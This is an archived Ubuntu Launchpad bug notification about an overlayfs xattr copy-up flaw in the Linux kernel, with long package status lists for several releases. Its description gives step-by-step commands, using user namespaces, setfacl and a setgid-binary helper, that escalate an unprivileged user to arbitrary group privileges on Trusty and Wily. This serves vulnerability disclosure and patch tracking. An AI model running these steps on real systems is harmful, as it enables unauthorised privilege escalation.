← Back to team overview

kernel-packages team mailing list archive

[Bug 1534961] Re: insecure overlayfs xattrs handling in copy_up

 

** Tags added: kernel-cve-skip-description

** Also affects: linux (Ubuntu Precise)
   Importance: Undecided
       Status: New

** Also affects: linux-armadaxp (Ubuntu Precise)
   Importance: Undecided
       Status: New

** Also affects: linux-lts-quantal (Ubuntu Precise)
   Importance: Undecided
       Status: New

** Also affects: linux-lts-saucy (Ubuntu Precise)
   Importance: Undecided
       Status: New

** Also affects: linux-goldfish (Ubuntu Precise)
   Importance: Undecided
       Status: New

** Also affects: linux-lts-trusty (Ubuntu Precise)
   Importance: Undecided
       Status: New

** Also affects: linux-lts-vivid (Ubuntu Precise)
   Importance: Undecided
       Status: New

** Also affects: linux-lts-wily (Ubuntu Precise)
   Importance: Undecided
       Status: New

** Also affects: linux-raspi2 (Ubuntu Precise)
   Importance: Undecided
       Status: New

** Also affects: linux-lts-xenial (Ubuntu Precise)
   Importance: Undecided
       Status: New

** Changed in: linux-lts-trusty (Ubuntu Precise)
       Status: New => Fix Released

** Changed in: linux-lts-trusty (Ubuntu Precise)
   Importance: Undecided => Medium

-- 
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1534961

Title:
  insecure overlayfs xattrs handling in copy_up

Status in linux package in Ubuntu:
  Confirmed
Status in linux-armadaxp package in Ubuntu:
  New
Status in linux-flo package in Ubuntu:
  New
Status in linux-goldfish package in Ubuntu:
  New
Status in linux-lts-quantal package in Ubuntu:
  New
Status in linux-lts-raring package in Ubuntu:
  New
Status in linux-lts-saucy package in Ubuntu:
  New
Status in linux-lts-trusty package in Ubuntu:
  New
Status in linux-lts-utopic package in Ubuntu:
  New
Status in linux-lts-vivid package in Ubuntu:
  New
Status in linux-lts-wily package in Ubuntu:
  New
Status in linux-lts-xenial package in Ubuntu:
  New
Status in linux-mako package in Ubuntu:
  New
Status in linux-manta package in Ubuntu:
  New
Status in linux-raspi2 package in Ubuntu:
  New
Status in linux-ti-omap4 package in Ubuntu:
  New
Status in linux source package in Precise:
  New
Status in linux-armadaxp source package in Precise:
  New
Status in linux-flo source package in Precise:
  New
Status in linux-goldfish source package in Precise:
  New
Status in linux-lts-quantal source package in Precise:
  New
Status in linux-lts-raring source package in Precise:
  New
Status in linux-lts-saucy source package in Precise:
  New
Status in linux-lts-trusty source package in Precise:
  Fix Released
Status in linux-lts-utopic source package in Precise:
  New
Status in linux-lts-vivid source package in Precise:
  New
Status in linux-lts-wily source package in Precise:
  New
Status in linux-lts-xenial source package in Precise:
  New
Status in linux-mako source package in Precise:
  New
Status in linux-manta source package in Precise:
  New
Status in linux-raspi2 source package in Precise:
  New
Status in linux-ti-omap4 source package in Precise:
  New
Status in linux source package in Trusty:
  Fix Released
Status in linux-armadaxp source package in Trusty:
  New
Status in linux-flo source package in Trusty:
  New
Status in linux-goldfish source package in Trusty:
  New
Status in linux-lts-quantal source package in Trusty:
  New
Status in linux-lts-raring source package in Trusty:
  New
Status in linux-lts-saucy source package in Trusty:
  New
Status in linux-lts-trusty source package in Trusty:
  New
Status in linux-lts-utopic source package in Trusty:
  New
Status in linux-lts-vivid source package in Trusty:
  New
Status in linux-lts-wily source package in Trusty:
  New
Status in linux-lts-xenial source package in Trusty:
  New
Status in linux-mako source package in Trusty:
  New
Status in linux-manta source package in Trusty:
  New
Status in linux-raspi2 source package in Trusty:
  New
Status in linux-ti-omap4 source package in Trusty:
  New
Status in linux source package in Vivid:
  Fix Released
Status in linux-armadaxp source package in Vivid:
  New
Status in linux-flo source package in Vivid:
  New
Status in linux-goldfish source package in Vivid:
  New
Status in linux-lts-quantal source package in Vivid:
  New
Status in linux-lts-raring source package in Vivid:
  New
Status in linux-lts-saucy source package in Vivid:
  New
Status in linux-lts-trusty source package in Vivid:
  New
Status in linux-lts-utopic source package in Vivid:
  New
Status in linux-lts-vivid source package in Vivid:
  New
Status in linux-lts-wily source package in Vivid:
  New
Status in linux-lts-xenial source package in Vivid:
  New
Status in linux-mako source package in Vivid:
  New
Status in linux-manta source package in Vivid:
  New
Status in linux-raspi2 source package in Vivid:
  New
Status in linux-ti-omap4 source package in Vivid:
  New
Status in linux source package in Wily:
  Fix Released
Status in linux-armadaxp source package in Wily:
  New
Status in linux-flo source package in Wily:
  New
Status in linux-goldfish source package in Wily:
  New
Status in linux-lts-quantal source package in Wily:
  New
Status in linux-lts-raring source package in Wily:
  New
Status in linux-lts-saucy source package in Wily:
  New
Status in linux-lts-trusty source package in Wily:
  New
Status in linux-lts-utopic source package in Wily:
  New
Status in linux-lts-vivid source package in Wily:
  New
Status in linux-lts-wily source package in Wily:
  New
Status in linux-lts-xenial source package in Wily:
  New
Status in linux-mako source package in Wily:
  New
Status in linux-manta source package in Wily:
  New
Status in linux-raspi2 source package in Wily:
  New
Status in linux-ti-omap4 source package in Wily:
  New
Status in linux source package in Xenial:
  Confirmed
Status in linux-armadaxp source package in Xenial:
  New
Status in linux-flo source package in Xenial:
  New
Status in linux-goldfish source package in Xenial:
  New
Status in linux-lts-quantal source package in Xenial:
  New
Status in linux-lts-raring source package in Xenial:
  New
Status in linux-lts-saucy source package in Xenial:
  New
Status in linux-lts-trusty source package in Xenial:
  New
Status in linux-lts-utopic source package in Xenial:
  New
Status in linux-lts-vivid source package in Xenial:
  New
Status in linux-lts-wily source package in Xenial:
  New
Status in linux-lts-xenial source package in Xenial:
  New
Status in linux-mako source package in Xenial:
  New
Status in linux-manta source package in Xenial:
  New
Status in linux-raspi2 source package in Xenial:
  New
Status in linux-ti-omap4 source package in Xenial:
  New

Bug description:
  On Ubuntu Trusty but also Ubuntu Wily, following sequence allows to
  gain group privileges of arbitrary groups that created directories
  with properties to be found using "find / -perm -02020", e.g.

  /usr/local/lib/python3.4 root.staff
  /var/lib/libuuid libuuid.libuuid
  /var/local root.staff
  /var/mail root.mail

  For Ubuntu Trusty, following sequence can be used to reproduce the
  problem:

  * In user/mount namespace:

  rm -rf Mnt Test
  mkdir Mnt Test
  mount -t overlayfs -o lowerdir=/var,upperdir=Test overlayfs Mnt

  * Outside namespace

  setfacl -m d:u:[your unpriv uid]:rwx Test

  * Inside:

  chmod 02777 Mnt/mail
  umount Mnt

  * Outside:

  ~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
  Test/mail/escalate ~/ReportUidGidCwd

  For Ubuntu Wily:

  * Inside:

  mkdir Mnt Test Work
  mount -t overlayfs -o lowerdir=/var,upperdir=Test,workdir=Work overlayfs Mnt

  * Outside:

  setfacl -m d:u::rwx,d:u:[your unpriv uid]:rwx Work/work

  * Inside:

  chmod 02777 Mnt/mail
  umount Mnt

  * Outside:

  ~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
  Test/mail/escalate ~/ReportUidGidCwd

  CreateSetgidBinary  is from
  http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/

  
  See also http://www.halfdog.net/Security/2016/UserNamespaceOverlayfsXattrSetgidPrivilegeEscalation/ (InvitedOnly/lY9yHKQj) and attached sharing policy.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1534961/+subscriptions